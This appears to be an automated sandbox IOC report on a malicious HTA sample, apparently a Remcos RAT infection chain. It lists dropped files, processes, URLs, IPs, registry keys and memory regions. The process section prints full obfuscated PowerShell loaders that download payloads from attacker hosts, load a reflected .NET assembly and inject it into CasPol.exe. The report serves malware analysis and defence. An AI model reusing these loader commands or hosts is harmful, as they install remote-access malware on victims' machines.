IOC Report
seethebestthignswhichgivingbestopportunities.hta

loading gif

Files

File Path
Type
Category
Malicious
seethebestthignswhichgivingbestopportunities.hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
dropped
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.out
Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES883E.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 17:52:41 2024, 1st section name ".debug$S"
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23tktpul.af1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jwfpjpe.haj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag1mfjzx.xjf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw5s3ehw.lvg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmdh42oq.w3x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eytv0bik.whx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkfm2a1g.arv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1iyyruq.wpo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5mqnq00.5d5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgwk5qel.12s.ps1
ASCII text, with no line terminators
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
192.3.220.29
malicious
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
unknown
malicious
banaya.duckdns.org
malicious
http://192.3.220.29/45/HDRDDG.txt
192.3.220.29
malicious
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://www.html-code-generator.com
unknown
http://192.3.220.29/45/seehaving
unknown
http://crl.microsoftG
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
142.215.209.78
https://1017.filemail.com
unknown
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM
unknown
https://aka.ms/pscore6LR
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
http://192.3.220.29/
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
unknown
http://www.microsoft.W?7
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
banaya.duckdns.org
192.3.101.149
malicious
geoplugin.net
178.237.33.50
ip.1017.filemail.com
142.215.209.78
1017.filemail.com
unknown

IPs

IP
Domain
Country
Malicious
192.3.220.29
unknown
United States
malicious
192.3.101.149
banaya.duckdns.org
United States
malicious
142.215.209.78
ip.1017.filemail.com
Canada
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-VCYBO3
time
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
C14000
heap
page read and write
malicious
27BE000
stack
page read and write
malicious
BF8000
heap
page read and write
malicious
C39000
heap
page read and write
malicious
5CC9000
trusted library allocation
page read and write
malicious
9356000
trusted library allocation
page read and write
malicious
4F6B000
heap
page read and write
4DA0000
trusted library allocation
page read and write
55C8000
heap
page read and write
6885000
trusted library allocation
page read and write
3030000
heap
page read and write
2C5F000
heap
page read and write
6F1B000
heap
page read and write
11CE000
stack
page read and write
70AD000
stack
page read and write
7800000
heap
page execute and read and write
4670000
heap
page read and write
7AF0000
trusted library allocation
page read and write
2DEE000
stack
page read and write
6DB0000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
6B1F000
heap
page read and write
7AA0000
trusted library allocation
page read and write
2C5E000
heap
page read and write
2DAE000
stack
page read and write
7B8C000
heap
page read and write
4F0F000
stack
page read and write
75F0000
trusted library allocation
page execute and read and write
74A5000
heap
page execute and read and write
306B000
heap
page read and write
7650000
trusted library allocation
page read and write
567E000
stack
page read and write
6EA2000
trusted library allocation
page read and write
2B79000
heap
page read and write
6827000
heap
page read and write
6C2B000
trusted library allocation
page read and write
6C1F000
trusted library allocation
page read and write
AF0000
heap
page read and write
4F49000
heap
page read and write
5C61000
trusted library allocation
page read and write
35B6000
heap
page read and write
2DAE000
stack
page read and write
6B1F000
heap
page read and write
2C7C000
heap
page read and write
4FAF000
heap
page read and write
53DE000
stack
page read and write
6EA2000
trusted library allocation
page read and write
7022F000
unkown
page readonly
8070000
trusted library allocation
page read and write
73ED000
heap
page read and write
3649000
trusted library allocation
page read and write
2C5F000
heap
page read and write
3137000
heap
page read and write
7189000
heap
page read and write
55BA000
heap
page read and write
7415000
heap
page execute and read and write
5709000
heap
page read and write
3229000
heap
page read and write
6885000
trusted library allocation
page read and write
50AF000
heap
page read and write
7E10000
trusted library allocation
page read and write
6C1B000
trusted library allocation
page read and write
7189000
heap
page read and write
3624000
trusted library allocation
page read and write
6825000
heap
page read and write
502F000
heap
page read and write
31BE000
stack
page read and write
4E0E000
stack
page read and write
7C28000
heap
page read and write
5210000
heap
page readonly
718F000
heap
page read and write
3399000
heap
page read and write
7175000
heap
page read and write
7530000
trusted library allocation
page read and write
4EE5000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
7DE0000
trusted library allocation
page read and write
3240000
heap
page read and write
7580000
trusted library allocation
page read and write
7C15000
heap
page read and write
51D7000
trusted library allocation
page read and write
310B000
heap
page read and write
7184000
heap
page read and write
777A000
heap
page read and write
719F000
heap
page read and write
56FA000
heap
page read and write
687C000
trusted library allocation
page read and write
6881000
trusted library allocation
page read and write
6B38000
heap
page read and write
8040000
trusted library allocation
page execute and read and write
7CAE000
stack
page read and write
7182000
heap
page read and write
6D6D000
stack
page read and write
796D000
stack
page read and write
6EA2000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
3430000
heap
page read and write
7D0E000
stack
page read and write
6B27000
heap
page read and write
529E000
stack
page read and write
687E000
trusted library allocation
page read and write
5706000
heap
page read and write
558F000
heap
page read and write
4FBE000
stack
page read and write
7E90000
trusted library allocation
page read and write
3237000
heap
page read and write
3249000
heap
page read and write
5270000
trusted library allocation
page read and write
5030000
heap
page execute and read and write
7BA5000
heap
page read and write
88B0000
trusted library allocation
page execute and read and write
574E000
stack
page read and write
7E80000
trusted library allocation
page read and write
7189000
heap
page read and write
7E50000
trusted library allocation
page read and write
4F3C000
stack
page read and write
6399000
trusted library allocation
page read and write
2C08000
heap
page read and write
5560000
heap
page read and write
2D60000
heap
page read and write
2C81000
heap
page read and write
6C1B000
trusted library allocation
page read and write
7777000
heap
page read and write
71D3000
heap
page read and write
6EA9000
trusted library allocation
page read and write
6860000
heap
page read and write
6863000
heap
page read and write
772B000
stack
page read and write
4F50000
heap
page read and write
50D5000
heap
page execute and read and write
4F13000
heap
page read and write
7149000
heap
page read and write
358E000
stack
page read and write
5281000
trusted library allocation
page read and write
6B26000
heap
page read and write
681B000
heap
page read and write
556E000
heap
page read and write
4AB0000
trusted library allocation
page read and write
5700000
heap
page read and write
687E000
trusted library allocation
page read and write
6670000
heap
page read and write
70211000
unkown
page execute read
687C000
trusted library allocation
page read and write
570E000
heap
page read and write
CE61000
trusted library allocation
page read and write
75F3000
trusted library allocation
page read and write
598E000
stack
page read and write
6B59000
heap
page read and write
6EA9000
trusted library allocation
page read and write
67EC000
heap
page read and write
5448000
trusted library allocation
page read and write
5563000
heap
page read and write
55C8000
heap
page read and write
50A0000
heap
page read and write
897E000
stack
page read and write
4830000
heap
page read and write
7A90000
trusted library allocation
page read and write
328E000
stack
page read and write
4625000
trusted library allocation
page execute and read and write
4BC5000
heap
page execute and read and write
53B0000
heap
page read and write
2C90000
heap
page read and write
7092000
direct allocation
page read and write
7184000
heap
page read and write
6EA2000
trusted library allocation
page read and write
5462000
trusted library allocation
page read and write
6B59000
heap
page read and write
4F67000
heap
page read and write
75D3000
trusted library allocation
page read and write
165E000
stack
page read and write
71D3000
heap
page read and write
504D000
heap
page read and write
6B59000
heap
page read and write
341E000
stack
page read and write
718D000
heap
page read and write
8ABD000
heap
page read and write
53CF000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
7194000
heap
page read and write
6888000
trusted library allocation
page read and write
346D000
trusted library allocation
page execute and read and write
687A000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
470C000
trusted library allocation
page read and write
6B22000
heap
page read and write
8A00000
trusted library allocation
page read and write
7590000
trusted library allocation
page execute and read and write
4EE1000
trusted library allocation
page read and write
71D3000
heap
page read and write
7171000
heap
page read and write
B1C000
stack
page read and write
33C0000
heap
page read and write
70C0000
heap
page read and write
3255000
heap
page read and write
3241000
heap
page read and write
79AB000
stack
page read and write
7145000
heap
page read and write
530E000
stack
page read and write
4F39000
heap
page read and write
73AE000
stack
page read and write
719C000
heap
page read and write
75D9000
trusted library allocation
page read and write
687C000
trusted library allocation
page read and write
6875000
trusted library allocation
page read and write
66DC000
heap
page read and write
582E000
stack
page read and write
67C8000
heap
page read and write
7600000
trusted library allocation
page read and write
AD5000
heap
page read and write
351E000
stack
page read and write
6B3D000
heap
page read and write
28BF000
stack
page read and write
2690000
heap
page read and write
5320000
heap
page read and write
3232000
heap
page read and write
75DB000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
5C4D000
stack
page read and write
56B2000
heap
page read and write
7470000
heap
page read and write
D461000
trusted library allocation
page read and write
6EA2000
trusted library allocation
page read and write
3237000
stack
page read and write
2C5D000
heap
page read and write
6EB0000
heap
page read and write
1180000
heap
page read and write
74F0000
trusted library allocation
page read and write
74DE000
stack
page read and write
3240000
heap
page read and write
6888000
trusted library allocation
page read and write
6EA9000
trusted library allocation
page read and write
717E000
heap
page read and write
775F000
stack
page read and write
6B3D000
heap
page read and write
7C9E000
stack
page read and write
361F000
stack
page read and write
AC0000
heap
page read and write
56B3000
heap
page read and write
55A2000
heap
page read and write
E4F1000
trusted library allocation
page read and write
559E000
heap
page read and write
6B7A000
heap
page read and write
722E000
stack
page read and write
892D000
stack
page read and write
2B98000
heap
page read and write
6DD5000
trusted library allocation
page read and write
7022D000
unkown
page read and write
8050000
trusted library allocation
page read and write
6C1B000
trusted library allocation
page read and write
2B90000
heap
page read and write
5E0E000
trusted library allocation
page read and write
7184000
heap
page read and write
757D000
stack
page read and write
6881000
trusted library allocation
page read and write
66E4000
heap
page read and write
4F11000
heap
page read and write
6FD0000
trusted library allocation
page read and write
7131000
heap
page read and write
4F6B000
heap
page read and write
7159000
heap
page read and write
8880000
trusted library allocation
page execute and read and write
718F000
heap
page read and write
6C9D000
stack
page read and write
7FC70000
trusted library allocation
page execute and read and write
3237000
heap
page read and write
4EA8000
trusted library allocation
page read and write
7126000
heap
page read and write
4F62000
heap
page read and write
6EA2000
trusted library allocation
page read and write
8AAD000
stack
page read and write
4F21000
heap
page read and write
7E70000
trusted library allocation
page read and write
7654000
trusted library allocation
page read and write
757B000
stack
page read and write
79F0000
heap
page read and write
2C5F000
heap
page read and write
322C000
heap
page read and write
4EC0000
trusted library allocation
page execute and read and write
4DD5000
trusted library allocation
page execute and read and write
93C000
stack
page read and write
719F000
heap
page read and write
2A3C000
stack
page read and write
4622000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
6C2B000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
6885000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
4FAB000
heap
page read and write
6862000
heap
page read and write
45B0000
heap
page read and write
6863000
heap
page read and write
55B8000
heap
page read and write
6C1B000
trusted library allocation
page read and write
3200000
heap
page read and write
776C000
heap
page read and write
713B000
heap
page read and write
30B2000
heap
page read and write
7129000
heap
page read and write
4F5D000
heap
page read and write
32D3000
heap
page read and write
4F40000
heap
page read and write
2C7A000
heap
page read and write
78FE000
stack
page read and write
6D90000
trusted library allocation
page execute
8CA1000
trusted library allocation
page read and write
3224000
heap
page read and write
5041000
trusted library allocation
page read and write
509C000
trusted library allocation
page read and write
6B37000
heap
page read and write
8890000
trusted library allocation
page read and write
7DF0000
trusted library allocation
page read and write
55BA000
heap
page read and write
5706000
heap
page read and write
6EA9000
trusted library allocation
page read and write
5198000
trusted library allocation
page read and write
32B0000
heap
page read and write
3637000
heap
page read and write
7B10000
trusted library allocation
page read and write
323E000
heap
page read and write
6881000
trusted library allocation
page read and write
532E000
stack
page read and write
7DCD000
stack
page read and write
7041000
heap
page read and write
DAC000
stack
page read and write
6885000
trusted library allocation
page read and write
6671000
heap
page read and write
57BB000
stack
page read and write
82ED000
stack
page read and write
5503000
trusted library allocation
page read and write
30C9000
heap
page read and write
7E80000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
55AF000
heap
page read and write
2C60000
heap
page read and write
2B8E000
stack
page read and write
4F29000
heap
page read and write
3060000
heap
page read and write
6888000
trusted library allocation
page read and write
719F000
heap
page read and write
2C7C000
heap
page read and write
4F55000
heap
page read and write
6C14000
trusted library allocation
page read and write
3130000
heap
page read and write
51F5000
trusted library allocation
page read and write
BF0000
heap
page read and write
7A30000
trusted library allocation
page read and write
268C000
stack
page read and write
7EA0000
trusted library allocation
page read and write
4650000
heap
page readonly
8C62000
trusted library allocation
page read and write
2C46000
heap
page read and write
7A3C000
stack
page read and write
4F67000
heap
page read and write
2C89000
heap
page read and write
7182000
heap
page read and write
76BD000
stack
page read and write
711B000
heap
page read and write
777F000
stack
page read and write
4B20000
heap
page readonly
66DD000
heap
page read and write
66F0000
heap
page read and write
7B59000
heap
